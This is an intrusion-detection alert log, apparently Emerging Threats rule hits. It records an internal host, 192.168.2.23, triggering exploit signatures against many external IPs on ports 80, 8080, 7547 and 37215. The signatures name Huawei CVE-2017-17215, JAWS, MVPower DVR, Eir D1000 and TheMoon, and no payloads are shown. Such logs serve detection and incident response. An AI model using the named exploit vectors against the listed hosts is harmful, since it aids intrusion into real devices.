ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 217.103.174.233

Timestamp:	03/18/24-09:58:15.833165
SID:	2025576
Source Port:	36958
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.254.79.157

Timestamp:	03/18/24-09:59:22.309690
SID:	2835222
Source Port:	45404
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 13.57.99.209

Timestamp:	03/18/24-09:59:34.318620
SID:	2025576
Source Port:	43918
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 154.93.187.141

Timestamp:	03/18/24-09:58:15.349369
SID:	2030092
Source Port:	54086
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 194.40.247.73

Timestamp:	03/18/24-09:59:00.092020
SID:	2025883
Source Port:	54872
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 172.173.117.250

Timestamp:	03/18/24-09:56:59.192599
SID:	2030092
Source Port:	33678
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.200.53

Timestamp:	03/18/24-09:58:50.483305
SID:	2018132
Source Port:	44048
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 34.120.206.128

Timestamp:	03/18/24-09:59:25.810828
SID:	2025883
Source Port:	34494
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 72.138.235.189

Timestamp:	03/18/24-09:59:40.054297
SID:	2023548
Source Port:	45750
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 211.33.200.176

Timestamp:	03/18/24-09:59:01.955309
SID:	2023548
Source Port:	43870
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 43.143.211.162

Timestamp:	03/18/24-09:58:27.368205
SID:	2030092
Source Port:	59206
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.81.222.9

Timestamp:	03/18/24-09:58:12.030261
SID:	2023548
Source Port:	58636
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 201.139.220.172

Timestamp:	03/18/24-10:00:15.671313
SID:	2025576
Source Port:	34824
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 82.9.9.253

Timestamp:	03/18/24-09:58:13.440265
SID:	2023548
Source Port:	36618
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 83.69.204.26

Timestamp:	03/18/24-09:58:33.521883
SID:	2030092
Source Port:	37742
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.103.219.117

Timestamp:	03/18/24-09:58:42.420268
SID:	2018132
Source Port:	36358
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 185.216.190.68

Timestamp:	03/18/24-09:58:44.258088
SID:	2025883
Source Port:	43684
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 187.120.202.149

Timestamp:	03/18/24-09:58:41.010551
SID:	2025576
Source Port:	45172
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.75.140.67

Timestamp:	03/18/24-09:58:16.198829
SID:	2023548
Source Port:	47132
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.233.250

Timestamp:	03/18/24-09:58:28.956097
SID:	2018132
Source Port:	54014
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.194.168

Timestamp:	03/18/24-10:00:03.524659
SID:	2018132
Source Port:	41896
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 49.107.36.197

Timestamp:	03/18/24-09:56:57.457902
SID:	2030092
Source Port:	48850
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.218.47.93

Timestamp:	03/18/24-09:59:47.429067
SID:	2025576
Source Port:	46898
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 154.36.141.6

Timestamp:	03/18/24-09:59:41.586277
SID:	2030092
Source Port:	40976
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.204.177

Timestamp:	03/18/24-09:59:55.905506
SID:	2018132
Source Port:	52300
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 34.225.83.253

Timestamp:	03/18/24-09:57:05.716958
SID:	2030092
Source Port:	37622
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 216.212.12.31

Timestamp:	03/18/24-09:59:39.704687
SID:	2023548
Source Port:	59722
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.194.52.107

Timestamp:	03/18/24-09:58:59.582202
SID:	2025883
Source Port:	46212
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 199.232.224.182

Timestamp:	03/18/24-09:58:44.610960
SID:	2030092
Source Port:	56868
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 71.212.69.155

Timestamp:	03/18/24-09:58:22.495358
SID:	2023548
Source Port:	53162
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 216.212.12.31

Timestamp:	03/18/24-09:59:39.805914
SID:	2023548
Source Port:	59782
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 179.155.26.219

Timestamp:	03/18/24-09:57:02.650162
SID:	2023548
Source Port:	44832
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 64.23.148.185

Timestamp:	03/18/24-09:59:44.117506
SID:	2025883
Source Port:	58998
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.40.210.21

Timestamp:	03/18/24-09:58:19.108087
SID:	2025883
Source Port:	50282
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.211.32

Timestamp:	03/18/24-09:57:01.097055
SID:	2018132
Source Port:	50142
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 173.33.97.108

Timestamp:	03/18/24-09:59:25.976943
SID:	2023548
Source Port:	54252
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.231.75

Timestamp:	03/18/24-09:59:36.548158
SID:	2018132
Source Port:	42478
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 176.56.242.49

Timestamp:	03/18/24-09:57:01.581043
SID:	2023548
Source Port:	53010
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 186.6.207.97

Timestamp:	03/18/24-10:00:15.497056
SID:	2023548
Source Port:	55594
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 27.232.81.207

Timestamp:	03/18/24-09:58:37.782696
SID:	2023548
Source Port:	56884
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 187.87.131.142

Timestamp:	03/18/24-09:58:40.986180
SID:	2025576
Source Port:	55594
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 202.164.238.99

Timestamp:	03/18/24-09:59:48.724619
SID:	2025883
Source Port:	53968
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 77.229.174.135

Timestamp:	03/18/24-09:58:36.463087
SID:	2025576
Source Port:	57816
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 96.46.108.112

Timestamp:	03/18/24-09:59:50.213024
SID:	2023548
Source Port:	41010
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 35.178.183.192

Timestamp:	03/18/24-09:58:26.913565
SID:	2030092
Source Port:	47222
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 202.151.67.115

Timestamp:	03/18/24-09:58:39.439950
SID:	2025576
Source Port:	60090
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 122.117.127.10

Timestamp:	03/18/24-09:57:00.596881
SID:	2025576
Source Port:	47554
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 74.36.158.199

Timestamp:	03/18/24-09:58:53.877668
SID:	2023548
Source Port:	34432
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 191.13.51.79

Timestamp:	03/18/24-09:58:13.314795
SID:	2023548
Source Port:	34564
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 202.120.33.37

Timestamp:	03/18/24-09:59:08.993735
SID:	2030092
Source Port:	52510
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 104.98.227.122

Timestamp:	03/18/24-09:58:52.609031
SID:	2025576
Source Port:	51656
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 92.248.32.183

Timestamp:	03/18/24-09:58:21.190866
SID:	2030092
Source Port:	59506
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 157.112.172.223

Timestamp:	03/18/24-09:59:26.421173
SID:	2030092
Source Port:	56834
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 83.132.201.222

Timestamp:	03/18/24-10:00:20.953711
SID:	2023548
Source Port:	33904
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 64.28.102.221

Timestamp:	03/18/24-09:59:05.873090
SID:	2025883
Source Port:	43628
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 201.227.42.107

Timestamp:	03/18/24-09:59:02.118082
SID:	2023548
Source Port:	52216
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 170.199.249.136

Timestamp:	03/18/24-10:00:05.971158
SID:	2023548
Source Port:	46792
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 52.207.236.202

Timestamp:	03/18/24-09:58:19.021722
SID:	2025883
Source Port:	48956
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 77.240.115.67

Timestamp:	03/18/24-09:57:03.693240
SID:	2025576
Source Port:	51670
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 5.9.39.198

Timestamp:	03/18/24-09:59:37.715645
SID:	2025883
Source Port:	59656
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 176.44.62.77

Timestamp:	03/18/24-09:59:16.043838
SID:	2023548
Source Port:	40420
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 104.17.102.138

Timestamp:	03/18/24-09:57:05.804300
SID:	2030092
Source Port:	36400
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.222.21.207

Timestamp:	03/18/24-09:59:19.268973
SID:	2025883
Source Port:	34422
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 24.127.59.199

Timestamp:	03/18/24-09:59:51.938843
SID:	2025883
Source Port:	44418
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 149.56.18.86

Timestamp:	03/18/24-09:59:57.885873
SID:	2025883
Source Port:	51800
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.195.120.252

Timestamp:	03/18/24-09:59:24.722497
SID:	2023548
Source Port:	55510
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 119.221.3.247

Timestamp:	03/18/24-09:58:24.235242
SID:	2023548
Source Port:	38160
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.196.91

Timestamp:	03/18/24-09:56:56.697515
SID:	2018132
Source Port:	42030
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 117.20.52.25

Timestamp:	03/18/24-09:58:57.385299
SID:	2025883
Source Port:	59110
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.226.161.138

Timestamp:	03/18/24-10:00:15.800780
SID:	2023548
Source Port:	37128
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 66.228.6.152

Timestamp:	03/18/24-09:59:37.291802
SID:	2023548
Source Port:	59332
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 192.99.35.77

Timestamp:	03/18/24-09:59:13.733684
SID:	2030092
Source Port:	55994
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 67.52.161.222

Timestamp:	03/18/24-09:59:51.991655
SID:	2025883
Source Port:	33448
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 186.57.49.133

Timestamp:	03/18/24-09:58:45.423450
SID:	2025576
Source Port:	43700
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 188.243.240.140

Timestamp:	03/18/24-09:59:05.831584
SID:	2030092
Source Port:	52664
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 71.32.167.11

Timestamp:	03/18/24-09:58:13.899911
SID:	2023548
Source Port:	36530
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 185.51.66.95

Timestamp:	03/18/24-10:00:23.987799
SID:	2025576
Source Port:	53886
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 210.99.193.49

Timestamp:	03/18/24-10:00:15.800844
SID:	2023548
Source Port:	37534
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 82.156.57.233

Timestamp:	03/18/24-09:58:14.617060
SID:	2025576
Source Port:	42248
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.167.158

Timestamp:	03/18/24-10:00:23.143461
SID:	2018132
Source Port:	39850
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 217.103.174.233

Timestamp:	03/18/24-09:58:16.001979
SID:	2025576
Source Port:	37064
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 222.102.108.150

Timestamp:	03/18/24-09:59:15.851066
SID:	2023548
Source Port:	51702
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 193.33.133.175

Timestamp:	03/18/24-09:58:44.320388
SID:	2030092
Source Port:	54034
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 187.60.83.119

Timestamp:	03/18/24-09:59:40.003443
SID:	2023548
Source Port:	45734
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.252.228.126

Timestamp:	03/18/24-09:58:35.052221
SID:	2023548
Source Port:	39192
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.208.50.66

Timestamp:	03/18/24-09:59:48.336153
SID:	2025576
Source Port:	48164
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 87.239.16.181

Timestamp:	03/18/24-09:58:36.925967
SID:	2025883
Source Port:	38904
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 184.85.156.190

Timestamp:	03/18/24-10:00:11.754710
SID:	2025576
Source Port:	44450
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.6.232.93

Timestamp:	03/18/24-09:59:31.287028
SID:	2030092
Source Port:	54602
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 104.104.180.253

Timestamp:	03/18/24-09:58:13.288549
SID:	2025576
Source Port:	60912
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 115.9.78.124

Timestamp:	03/18/24-09:58:51.609334
SID:	2023548
Source Port:	56358
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 208.103.191.99

Timestamp:	03/18/24-09:58:37.860181
SID:	2030092
Source Port:	57362
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 89.161.189.73

Timestamp:	03/18/24-09:58:21.168628
SID:	2030092
Source Port:	48826
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.225.88.98

Timestamp:	03/18/24-09:58:16.681620
SID:	2023548
Source Port:	45224
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.77.241.19

Timestamp:	03/18/24-09:58:36.428050
SID:	2025576
Source Port:	59878
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.57.187.50

Timestamp:	03/18/24-10:00:10.177570
SID:	2025883
Source Port:	55482
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 50.60.164.64

Timestamp:	03/18/24-09:58:21.595909
SID:	2023548
Source Port:	53416
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.211.237

Timestamp:	03/18/24-09:59:32.979088
SID:	2018132
Source Port:	36920
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 3.219.74.255

Timestamp:	03/18/24-09:59:13.733579
SID:	2025576
Source Port:	46636
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 154.215.105.116

Timestamp:	03/18/24-09:59:17.439972
SID:	2023548
Source Port:	47138
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.203.5.227

Timestamp:	03/18/24-09:58:38.245198
SID:	2023548
Source Port:	57504
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 118.31.15.44

Timestamp:	03/18/24-09:59:09.037596
SID:	2030092
Source Port:	56934
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 104.66.74.160

Timestamp:	03/18/24-09:58:31.173056
SID:	2025883
Source Port:	39976
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 154.204.164.112

Timestamp:	03/18/24-09:59:15.523241
SID:	2030092
Source Port:	54334
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.233.17

Timestamp:	03/18/24-09:59:13.961899
SID:	2018132
Source Port:	48678
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 35.213.150.26

Timestamp:	03/18/24-10:00:24.123800
SID:	2025576
Source Port:	39420
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 94.101.224.57

Timestamp:	03/18/24-09:56:59.988346
SID:	2030092
Source Port:	53486
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.133.186.128

Timestamp:	03/18/24-09:57:00.643851
SID:	2023548
Source Port:	41680
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 18.245.75.170

Timestamp:	03/18/24-09:57:04.817683
SID:	2025576
Source Port:	39946
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.173.248.126

Timestamp:	03/18/24-09:58:43.671873
SID:	2023548
Source Port:	55140
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.114.221

Timestamp:	03/18/24-09:59:26.018755
SID:	2018132
Source Port:	42194
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 13.249.76.100

Timestamp:	03/18/24-09:59:39.896995
SID:	2025576
Source Port:	51076
Destination Port:	80
Protocol:	TCP
